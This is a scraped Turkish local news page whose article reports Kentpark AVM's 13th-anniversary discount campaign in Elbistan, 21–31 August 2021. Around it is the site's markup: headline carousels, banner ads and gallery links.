</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/minikler-kizilderililerin-sira-disi-dunyasini-kesfedecek-h38435.html" title="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek" />
Minikler, Kızılderililerin sıra dışı dünyasını keşfedecek</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/ogrenciler-hedefi-12den-vurmak-icin-yaristi-h38434.html" title="Öğrenciler hedefi 12’den vurmak için yarıştı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/ogrenciler_hedefi_12den_vurmak_icin_yaristi.jpg" alt="Öğrenciler hedefi 12’den vurmak için yarıştı" />
Öğrenciler hedefi 12’den vurmak için yarıştı</a>
</div>
</div><div class="kathab"><div>
<a href="http://www.elbistaninsesi.com/kahramanmaras/piazzada-indirim-yarisi-h35825.html" title="Piazza’da indirim yarışı"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2016/08/piazzada_indirim_yarisi.jpg" alt="Piazza’da indirim yarışı" />
Piazza’da indirim yarışı</a>
</div>
</div></div> </div>
  </div>
  
</div>
          </div>
    
    <div id="mainContainer" class="container center  shadow" style="padding-top:20px;">

            <div class="page-header-fixed style hide">
        <div class="container center">
        <div class="title"></div>
        <div class="pull-right">          <span class="scroll-link d-goto" id="yorumyaplink" style="margin-right: 15px;"><i class="halflings-icon comments"></i> Yorum Yap</span>          <a class="print d-print" href="javascript:window.print()" style="margin-right: 15px;"><i class="halflings-icon print"></i> Yazdır</a>
          <a href="javascript:void(0);" onclick="shareFacebook(gsTitle, gsUrl);" class="d-share" rel="nofollow" style="margin-right: 15px;"><i class="halflings-icon share-alt"></i> <b>Facebook</b>'ta Paylaş</a>
        </div>
        </div>
      </div>
      
      
      
      
<div class="reklam-fluid reklam reklam106"><a href="http://www.elbistaninsesi.com/banner.php?id=136" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/a5_1.gif" width="980" height="250" style="width:980px;height: 250px;border:0" alt="banner136" class="img-responsive"/></a></div>
<div id="ustmanset" class="fluid ustmanset  ustmanset5">
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html" title="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/08/002_2.jpg" alt="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" />
      <div class="caption">Tohumunu Avrupa’dan getirdi, dev kabak...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html" title="Siyah çekirdekte erken hasat uyarısı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/08/İsimsiz-2_2.jpg" alt="Siyah çekirdekte erken hasat uyarısı" />
      <div class="caption">Siyah çekirdekte erken hasat uyarısı</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html" title="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/08/004_1.jpg" alt="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" />
      <div class="caption">Kaymakam Demir, sel ve taşkının...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-dogu-ile-batinin-gecis-noktasi-olacak-h70938.html" title="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/08/başkan.jpg" alt="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”" />
      <div class="caption">Başkan Gürbüz: “Elbistan, doğu ile...</div>    </a>
  </div>
    <div class="span">
    <a href="http://www.elbistaninsesi.com/guncel/kara-rapor-aciklandi-hava-kirliliginde-ilk-10dayiz-h70929.html" title="Kara Rapor açıklandı, hava kirliliğinde ilk 10’dayız" >
      <img src="http://www.elbistaninsesi.com/images/haberler/ustmanset/2021/08/Kara-Rapor-acıklandı-hava-kirliliğinde-ilk-10-dayız.001.jpg" alt="Kara Rapor açıklandı, hava kirliliğinde ilk 10’dayız" />
      <div class="caption">Kara Rapor açıklandı, hava kirliliğinde...</div>    </a>
  </div>
  </div>
<!-- Üst Manşet -->

<div class="reklam-fluid reklam reklam109"><a href="http://www.elbistaninsesi.com/banner.php?id=191" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/kentpark-13.yıl.gif" width="980" height="202" style="width:980px;height: 202px;border:0" alt="banner191" class="img-responsive"/></a></div>

      
      <!-- MAIN -->

      
      
      
      
      <div class="row">

        
        <!-- Sol Blok -->
        <div id="main" class="span8">
          <div class="reklam reklam129"><a href="http://www.elbistaninsesi.com/banner.php?id=162" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/balıkcı.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner162" class="img-responsive"/></a></div>
<article id="haber">

    
    
          <div class="page-header clearfix">
        <h1 class="title gs-title" itemprop="name">Kentpark’tan 13. yıla özel indirimler</h1>
                <h2 class="lead" itemprop="description"><strong>Elbistan’ın en büyük alışveriş merkezlerinden olan Kentpark AVM, kuruluşunun 13. yılına özel indirim kampanyası başlattı.</strong></h2>
      </div>
    
            <div class="clearfix muted">
        <p class="pull-left"><span itemprop="datePublished" class="tarih-degistir" data-date="2021-08-21 09:50:27" content="2021-08-21T09:50:27+02:00">21 Ağustos 2021 Cumartesi 09:50</span></p>
              </div>
      
              <div class="clearfix newspic">
      <span>
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" alt="Kentpark’tan 13. yıla özel indirimler" itemprop="image"/>
      </span>
    </div>
    <div class="clearfix page-social">
        <div class="shr">
        <div id="paylas" class="hs-paylas paylas-haber-70944"></div>        </div>
        <div class="karakterislem secilemez pull-right">
          <i class="glyphicons-icon text_smaller"></i>
          <i class="glyphicons-icon text_bigger"></i>
          <i class="glyphicons-icon font"></i>
          <a class="print" href="javascript:window.print()"><i class="glyphicons-icon print"></i></a>
        </div>
    </div>
      

  <div id="newstext" class="clearfix page-content">
    
                <div class="reklam reklam134 text-center"><a href="http://www.elbistaninsesi.com/banner.php?id=167" target="_blank" rel="nofollow"><img src="http://www.elbistaninsesi.com/images/banner/hunkar.gif" width="600" height="300" style="width:600px;height: 300px;border:0" alt="banner167" class="img-responsive"/></a></div>        <div itemprop="articleBody" id="newsbody"><p></p><div class="p_ad"></div>

<p><span style="font-size:16px;">21-31 Ağustos tarihleri arasında geçerli olacak indirimlerle ilgili olarak Kentpark AVM yetkilileri yaptıkları açıklamada “Kentpark AVM olarak 13. yılımıza özel indirim kampanyaları düzenledik. Kaliteli ve güler yüzlü hizmet anlayışımızla Elbistan’da 8 şubemizde hizmet veriyoruz. 21-31 Ağustos tarihleri arasında gıdadan zücaciyeye, kişisel bakımdan temizlik malzemelerine kadar birçok üründe kuruluşumuzun 13. yılına özel çok cazip fiyatlar ve özel indirimlerimiz olacak. İndirimlerden ve kampanyalı ürünlerden yararlanmak için tüm halkımızı mağazalarımıza bekliyoruz” ifadelerine yer verdiler.</span></p></p></div>
                    
  
  </div>
  </article>

    <div class="hide-print">
    
<div id="anamanset" class="carousel carousel-nav hs-manset manset-standart modul-haber slid secilemez">

  <ol class="carousel-indicators twentyfive carousel-hover">

        <li class="hs-bgca active" onclick="window.location='http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html'; return false;"  data-target="#anamanset" data-slide-to="0">1</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html'; return false;"  data-target="#anamanset" data-slide-to="1">2</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html'; return false;"  data-target="#anamanset" data-slide-to="2">3</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html'; return false;"  data-target="#anamanset" data-slide-to="3">4</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kodazdan-suriyeli-siginmacilar-aciklamasi-h70939.html'; return false;"  data-target="#anamanset" data-slide-to="4">5</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-dogu-ile-batinin-gecis-noktasi-olacak-h70938.html'; return false;"  data-target="#anamanset" data-slide-to="5">6</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/atiksu-aritma-tesisi-hizla-yukseliyor-h70937.html'; return false;"  data-target="#anamanset" data-slide-to="6">7</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/vizontele-koyde-projesi-ile-sinema-ayaklarina-geldi-h70936.html'; return false;"  data-target="#anamanset" data-slide-to="7">8</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/oztuncun-soru-onergesine-iki-yil-sonra-cevap-geldi-h70934.html'; return false;"  data-target="#anamanset" data-slide-to="8">9</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kahramanmarasta-4-ilcenin-kaymakami-degisti-h70933.html'; return false;"  data-target="#anamanset" data-slide-to="9">10</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/yardimcioglu-ulke-gerceklerine-donelim-h70931.html'; return false;"  data-target="#anamanset" data-slide-to="10">11</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/acik-hava-etkinlikleri-h70930.html'; return false;"  data-target="#anamanset" data-slide-to="11">12</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/kara-rapor-aciklandi-hava-kirliliginde-ilk-10dayiz-h70929.html'; return false;"  data-target="#anamanset" data-slide-to="12">13</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/erdem-projesini-ulke-genelinde-137-kahramanmarasta-ise-3-okul-kazandi-h70928.html'; return false;"  data-target="#anamanset" data-slide-to="13">14</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-tirastan-mahir-unala-yol-tesekkuru-h70927.html'; return false;"  data-target="#anamanset" data-slide-to="14">15</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/haftalik-vaka-sayisinda-artis-hiz-kesmedi-h70926.html'; return false;"  data-target="#anamanset" data-slide-to="15">16</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/karayollarindan-selale-yoluna-450-metre-duvar-h70925.html'; return false;"  data-target="#anamanset" data-slide-to="16">17</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/42-yil-sonra-mezuniyet-toreni-duzenlediler-h70924.html'; return false;"  data-target="#anamanset" data-slide-to="17">18</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/tatil-yolunda-feci-kaza-anne-ve-2-kizi-hayatini-kaybetti-h70923.html'; return false;"  data-target="#anamanset" data-slide-to="18">19</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ders-zili-velilerin-cuzdanini-zorlayacak-h70914.html'; return false;"  data-target="#anamanset" data-slide-to="19">20</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/ziraat-odasi-baskanlari-elbistanda-bulustu-2-h70913.html'; return false;"  data-target="#anamanset" data-slide-to="20">21</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/elma-agaci-agustos-ortasinda-cicek-acti-h70912.html'; return false;"  data-target="#anamanset" data-slide-to="21">22</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/baskan-gurbuz-gun-birlik-olma-gunudur-h70911.html'; return false;"  data-target="#anamanset" data-slide-to="22">23</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/yasadisi-yaban-kecisi-avi-icin-kurulan-evsinler-imha-edildi-h70910.html'; return false;"  data-target="#anamanset" data-slide-to="23">24</li>
        <li class="hs-bgca" onclick="window.location='http://www.elbistaninsesi.com/guncel/uyusturucu-saticilari-tutuklandi-h70909.html'; return false;"  data-target="#anamanset" data-slide-to="24">25</li>
    
      </ol>

  <div class="carousel-inner">

        <div class="item active">
      <a href="http://www.elbistaninsesi.com/guncel/tohumunu-avrupadan-getirdi-dev-kabak-gorenleri-sasirtiyor-h70945.html" title="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/tohumunu_avrupadan_getirdi_dev_kabak_gorenleri_sasirtiyor_h70945_be897.jpg" alt="Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tohumunu Avrupa’dan getirdi, dev kabak görenleri şaşırtıyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kentparktan-13-yila-ozel-indirimler-h70944.html" title="Kentpark’tan 13. yıla özel indirimler">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kentparktan_13_yila_ozel_indirimler_h70944_10c87.jpg" alt="Kentpark’tan 13. yıla özel indirimler" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kentpark’tan 13. yıla özel indirimler</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/siyah-cekirdekte-erken-hasat-uyarisi-h70941.html" title="Siyah çekirdekte erken hasat uyarısı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/siyah_cekirdekte_erken_hasat_uyarisi_h70941_e88e5.jpg" alt="Siyah çekirdekte erken hasat uyarısı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Siyah çekirdekte erken hasat uyarısı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-sel-ve-taskinin-yasandigi-gecitte-inceleme-h70940.html" title="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kaymakam_demir_sel_ve_taskinin_yasandigi_gecitte_inceleme_yapti_h70940_9e5d6.jpg" alt="Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kaymakam Demir, sel ve taşkının yaşandığı Geçit’te inceleme yaptı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kodazdan-suriyeli-siginmacilar-aciklamasi-h70939.html" title="Kodaz’dan Suriyeli sığınmacılar açıklaması">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kodazdan_suriyeli_siginmacilar_aciklamasi_h70939_9771a.jpg" alt="Kodaz’dan Suriyeli sığınmacılar açıklaması" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kodaz’dan Suriyeli sığınmacılar açıklaması</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-elbistan-dogu-ile-batinin-gecis-noktasi-olacak-h70938.html" title="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/baskan_gurbuz_elbistan_dogu_ile_batinin_gecis_noktasi_olacak_h70938_ecfae.jpg" alt="Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz: “Elbistan, doğu ile batının geçiş noktası olacak”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/atiksu-aritma-tesisi-hizla-yukseliyor-h70937.html" title="Atıksu Arıtma Tesisi hızla yükseliyor">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/atiksu_aritma_tesisi_hizla_yukseliyor_h70937_94df0.jpg" alt="Atıksu Arıtma Tesisi hızla yükseliyor" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Atıksu Arıtma Tesisi hızla yükseliyor</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/vizontele-koyde-projesi-ile-sinema-ayaklarina-geldi-h70936.html" title="Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/vizontele_koyde_projesi_ile_sinema_ayaklarina_geldi_h70936_29f73.jpg" alt="Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Vizontele Köyde&#039; projesi ile sinema ayaklarına geldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/oztuncun-soru-onergesine-iki-yil-sonra-cevap-geldi-h70934.html" title="Öztunç’un soru önergesine iki yıl sonra cevap geldi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/oztuncun_soru_onergesine_iki_yil_sonra_cevap_geldi_h70934_eef81.jpg" alt="Öztunç’un soru önergesine iki yıl sonra cevap geldi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Öztunç’un soru önergesine iki yıl sonra cevap geldi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kahramanmarasta-4-ilcenin-kaymakami-degisti-h70933.html" title="Kahramanmaraş’ta 4 ilçenin kaymakamı değişti ">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kahramanmarasta_4_ilcenin_kaymakami_degisti_h70933_cdc45.jpg" alt="Kahramanmaraş’ta 4 ilçenin kaymakamı değişti " />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kahramanmaraş’ta 4 ilçenin kaymakamı değişti </span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/yardimcioglu-ulke-gerceklerine-donelim-h70931.html" title="Yardımcıoğlu: “Ülke gerçeklerine dönelim”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/yardimcioglu_ulke_gerceklerine_donelim_h70931_13c7f.jpg" alt="Yardımcıoğlu: “Ülke gerçeklerine dönelim”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yardımcıoğlu: “Ülke gerçeklerine dönelim”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/acik-hava-etkinlikleri-h70930.html" title="Açık hava etkinlikleri">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/acik_hava_etkinlikleri_h70930_8ecec.jpg" alt="Açık hava etkinlikleri" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Açık hava etkinlikleri</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/kara-rapor-aciklandi-hava-kirliliginde-ilk-10dayiz-h70929.html" title="Kara Rapor açıklandı, hava kirliliğinde ilk 10’dayız">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/kara_rapor_aciklandi_hava_kirliliginde_ilk_10dayiz_h70929_7f3c5.jpg" alt="Kara Rapor açıklandı, hava kirliliğinde ilk 10’dayız" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Kara Rapor açıklandı, hava kirliliğinde ilk 10’dayız</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/erdem-projesini-ulke-genelinde-137-kahramanmarasta-ise-3-okul-kazandi-h70928.html" title="ERDEM Projesini ülke genelinde 137, Kahramanmaraş’ta ise 3 okul kazandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/erdem_projesini_ulke_genelinde_137_kahramanmarasta_ise_3_okul_kazandi_h70928_a9df8.jpg" alt="ERDEM Projesini ülke genelinde 137, Kahramanmaraş’ta ise 3 okul kazandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">ERDEM Projesini ülke genelinde 137, Kahramanmaraş’ta ise 3 okul kazandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-tirastan-mahir-unala-yol-tesekkuru-h70927.html" title="Başkan Tıraş’tan Mahir Ünal’a yol teşekkürü">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/baskan_tirastan_mahir_unala_yol_tesekkuru_h70927_015d3.jpg" alt="Başkan Tıraş’tan Mahir Ünal’a yol teşekkürü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Tıraş’tan Mahir Ünal’a yol teşekkürü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/haftalik-vaka-sayisinda-artis-hiz-kesmedi-h70926.html" title="Haftalık vaka sayısında artış hız kesmedi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/haftalik_vaka_sayisinda_artis_hiz_kesmedi_h70926_8fc6f.jpg" alt="Haftalık vaka sayısında artış hız kesmedi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Haftalık vaka sayısında artış hız kesmedi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/karayollarindan-selale-yoluna-450-metre-duvar-h70925.html" title="Karayolları’ndan şelale yoluna 450 metre duvar">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/karayollarindan_selale_yoluna_450_metre_duvar_h70925_e85c1.jpg" alt="Karayolları’ndan şelale yoluna 450 metre duvar" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Karayolları’ndan şelale yoluna 450 metre duvar</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/42-yil-sonra-mezuniyet-toreni-duzenlediler-h70924.html" title="42 yıl sonra mezuniyet töreni düzenlediler">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/42_yil_sonra_mezuniyet_toreni_duzenlediler_h70924_d993d.jpg" alt="42 yıl sonra mezuniyet töreni düzenlediler" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">42 yıl sonra mezuniyet töreni düzenlediler</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/tatil-yolunda-feci-kaza-anne-ve-2-kizi-hayatini-kaybetti-h70923.html" title="Tatil yolunda feci kaza: anne ve 2 kızı hayatını kaybetti">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/tatil_yolunda_feci_kaza_anne_ve_2_kizi_hayatini_kaybetti_h70923_39e59.jpg" alt="Tatil yolunda feci kaza: anne ve 2 kızı hayatını kaybetti" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Tatil yolunda feci kaza: anne ve 2 kızı hayatını kaybetti</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ders-zili-velilerin-cuzdanini-zorlayacak-h70914.html" title="Ders zili velilerin cüzdanını zorlayacak">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/ders_zili_velilerin_cuzdanini_zorlayacak_h70914_1853c.jpg" alt="Ders zili velilerin cüzdanını zorlayacak" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ders zili velilerin cüzdanını zorlayacak</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/ziraat-odasi-baskanlari-elbistanda-bulustu-2-h70913.html" title="Ziraat Odası Başkanları Elbistan’da buluştu">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/ziraat_odasi_baskanlari_elbistanda_bulustu_h70913_67642.JPG" alt="Ziraat Odası Başkanları Elbistan’da buluştu" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Ziraat Odası Başkanları Elbistan’da buluştu</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/elma-agaci-agustos-ortasinda-cicek-acti-h70912.html" title="Elma ağacı ağustos ortasında çiçek açtı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/elma_agaci_agustos_ortasinda_cicek_acti_h70912_eafd1.jpg" alt="Elma ağacı ağustos ortasında çiçek açtı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Elma ağacı ağustos ortasında çiçek açtı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/baskan-gurbuz-gun-birlik-olma-gunudur-h70911.html" title="Başkan Gürbüz, “Gün birlik olma günüdür”">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/baskan_gurbuz_gun_birlik_olma_gunudur_h70911_2dbb8.jpg" alt="Başkan Gürbüz, “Gün birlik olma günüdür”" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Başkan Gürbüz, “Gün birlik olma günüdür”</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/yasadisi-yaban-kecisi-avi-icin-kurulan-evsinler-imha-edildi-h70910.html" title="Yasadışı yaban keçisi avı için kurulan evsinler imha edildi">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/yasadisi_yaban_kecisi_avi_icin_kurulan_evsinler_imha_edildi_h70910_2f7f6.jpg" alt="Yasadışı yaban keçisi avı için kurulan evsinler imha edildi" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Yasadışı yaban keçisi avı için kurulan evsinler imha edildi</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/uyusturucu-saticilari-tutuklandi-h70909.html" title="Uyuşturucu satıcıları tutuklandı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/08/uyusturucu_saticilari_tutuklandi_h70909_02f74.jpg" alt="Uyuşturucu satıcıları tutuklandı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Uyuşturucu satıcıları tutuklandı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
